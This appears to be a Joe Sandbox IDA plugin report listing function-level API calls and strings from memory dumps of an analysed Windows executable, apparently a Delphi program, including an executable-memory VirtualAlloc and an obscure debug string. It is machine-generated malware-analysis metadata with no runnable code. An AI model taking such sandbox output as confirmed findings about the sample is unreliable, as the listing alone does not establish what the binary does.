Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00405C50, Relevance: 15.1, APIs: 10, Instructions: 98

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Delphi\Locales, xrefs: 00405BB0
Software\Borland\Locales, xrefs: 00405B74, 00405B92

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 0045B794, Relevance: 3.1, APIs: 2, Instructions: 96

APIs

VirtualAlloc.KERNEL32(00000000,000065E4,00003000,00000040), ref: 0045B7ED
GetConsoleCP.KERNEL32 ref: 0045B84B

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00455A80, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130

APIs

Part of subcall function 0041C830: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

GetClassInfoA.USER32(00400000,00455768,?), ref: 00455AD5
RegisterClassA.USER32(0045CC38), ref: 00455AED

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Part of subcall function 00407100: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

SetWindowLongA.USER32(0000000E,000000FC,10800000), ref: 00455B89
DeleteMenu.USER32(00000000,0000F010,00000000), ref: 00455BFC

Part of subcall function 00456674: LoadIconA.USER32(00000000,00007F00), ref: 0045668A

SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455BAB
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00455BBE
GetSystemMenu.USER32(0000000E,00000000), ref: 00455BC9
DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00455BD8
DeleteMenu.USER32(00000000,0000F000,00000000), ref: 00455BE5

Strings

hWE, xrefs: 00455AC9, 00455B60
H@F, xrefs: 00455AA9
hKF, xrefs: 00455B8E, 00455BEA

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00442338, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103

APIs

GetCurrentProcessId.KERNEL32(?,00000000,004424B0), ref: 00442359
GlobalAddAtomA.KERNEL32(00000000), ref: 0044238C
GetCurrentThreadId.KERNEL32(?,?,00000000,004424B0), ref: 004423A7
GlobalAddAtomA.KERNEL32(00000000), ref: 004423DD
RegisterClipboardFormatA.USER32(00000000), ref: 004423F3

Part of subcall function 00413F7C: RtlInitializeCriticalSection.KERNEL32(0041177C,?,?,00442409,00000000,00000000,?,?,00000000,004424B0), ref: 00413F9B

Part of subcall function 00441F3C: SetErrorMode.KERNEL32(00008000), ref: 00441F55
Part of subcall function 00441F3C: GetModuleHandleA.KERNEL32(USER32,00000000,004420A2,?,00008000), ref: 00441F79
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,004420A2,?,00008000), ref: 00441F86
Part of subcall function 00441F3C: LoadLibraryA.KERNEL32(IMM32.DLL), ref: 00441FA2
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FC4
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FD9
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FEE
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442003
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442018
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2), ref: 0044202D
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000), ref: 00442042
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00442057
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0044206C
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00442081
Part of subcall function 00441F3C: SetErrorMode.KERNEL32(?,004420A9,00008000), ref: 0044209C

Part of subcall function 00454694: GetKeyboardLayout.USER32(00000000), ref: 004546D9
Part of subcall function 00454694: GetDC.USER32(00000000), ref: 0045472E
Part of subcall function 00454694: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00454738
Part of subcall function 00454694: ReleaseDC.USER32(00000000,00000000), ref: 00454743

Part of subcall function 00455778: LoadIconA.USER32(00400000,MAINICON), ref: 0045585D
Part of subcall function 00455778: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00442448,00000000,00000000,?,?,00000000,004424B0), ref: 0045588F
Part of subcall function 00455778: OemToCharA.USER32(?,?), ref: 004558A2
Part of subcall function 00455778: CharLowerA.USER32(?), ref: 004558E2

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442477
GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442488

Strings

ControlOfs%.8X%.8X, xrefs: 004423BB
Delphi%.8X, xrefs: 0044236A
AnimateWindow, xrefs: 00442482
USER32, xrefs: 00442472

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00455778, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0045585D
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00442448,00000000,00000000,?,?,00000000,004424B0), ref: 0045588F
OemToCharA.USER32(?,?), ref: 004558A2
CharLowerA.USER32(?), ref: 004558E2

Part of subcall function 00455A80: GetClassInfoA.USER32(00400000,00455768,?), ref: 00455AD5
Part of subcall function 00455A80: RegisterClassA.USER32(0045CC38), ref: 00455AED
Part of subcall function 00455A80: SetWindowLongA.USER32(0000000E,000000FC,10800000), ref: 00455B89
Part of subcall function 00455A80: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455BAB
Part of subcall function 00455A80: SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00455BBE
Part of subcall function 00455A80: GetSystemMenu.USER32(0000000E,00000000), ref: 00455BC9
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00455BD8
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F000,00000000), ref: 00455BE5
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F010,00000000), ref: 00455BFC

Strings

,@F, xrefs: 00455855, 00455887
4@F, xrefs: 004558FD
MAINICON, xrefs: 00455850

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00401A54, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48

APIs

RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Strings

M!, xrefs: 00401A5A

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0045B894, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28

APIs

GetConsoleCP.KERNEL32 ref: 0045B898
GetVersion.KERNEL32 ref: 0045B8AF
OutputDebugStringA.KERNEL32(XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH), ref: 0045B8BE

Part of subcall function 0045B794: VirtualAlloc.KERNEL32(00000000,000065E4,00003000,00000040), ref: 0045B7ED
Part of subcall function 0045B794: GetConsoleCP.KERNEL32 ref: 0045B84B

Strings

XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH, xrefs: 0045B8B9
Z5, xrefs: 0045B8A1

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0044256C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34

APIs

GetVersion.KERNEL32(00000000,004425F2), ref: 00442586

Part of subcall function 00442338: GetCurrentProcessId.KERNEL32(?,00000000,004424B0), ref: 00442359
Part of subcall function 00442338: GlobalAddAtomA.KERNEL32(00000000), ref: 0044238C
Part of subcall function 00442338: GetCurrentThreadId.KERNEL32(?,?,00000000,004424B0), ref: 004423A7
Part of subcall function 00442338: GlobalAddAtomA.KERNEL32(00000000), ref: 004423DD
Part of subcall function 00442338: RegisterClipboardFormatA.USER32(00000000), ref: 004423F3
Part of subcall function 00442338: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442477
Part of subcall function 00442338: GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442488

Strings

*C, xrefs: 004425A0, 004425AA, 004425B4, 004425C4, 004425D4
l'D, xrefs: 004425DA
H&D, xrefs: 004425CA

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

GetSystemMetrics.USER32(?), ref: 004264D6

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

KiUserApcDispatcher.NTDLL(?), ref: 0042649C

Strings

GetSystemMetrics, xrefs: 00426484

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00402140, Relevance: 3.1, APIs: 2, Instructions: 124

APIs

RtlEnterCriticalSection.KERNEL32(004645C4,00000000,004022BC), ref: 0040218B
RtlLeaveCriticalSection.KERNEL32(004645C4,004022C3), ref: 004022B6

Part of subcall function 00401A54: RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
Part of subcall function 00401A54: RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
Part of subcall function 00401A54: LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
Part of subcall function 00401A54: RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0040156C, Relevance: 2.5, APIs: 2, Instructions: 37

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401875), ref: 0040159B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401875), ref: 004015C2

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00406420, Relevance: 1.5, APIs: 1, Instructions: 31

APIs

LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004070FE, Relevance: 1.5, APIs: 1, Instructions: 28

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00407100, Relevance: 1.5, APIs: 1, Instructions: 27

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00405908, Relevance: 1.5, APIs: 1, Instructions: 26

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?,00000400,?,004101C4,00413D13,00000000,00413D38), ref: 00405926

Part of subcall function 00405B44: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
Part of subcall function 00405B44: RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
Part of subcall function 00405B44: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
Part of subcall function 00405B44: GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
Part of subcall function 00405B44: GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
Part of subcall function 00405B44: lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00455F14, Relevance: 1.5, APIs: 1, Instructions: 24

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00455F3E

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00401700, Relevance: 1.3, APIs: 1, Instructions: 54

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0040176D

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

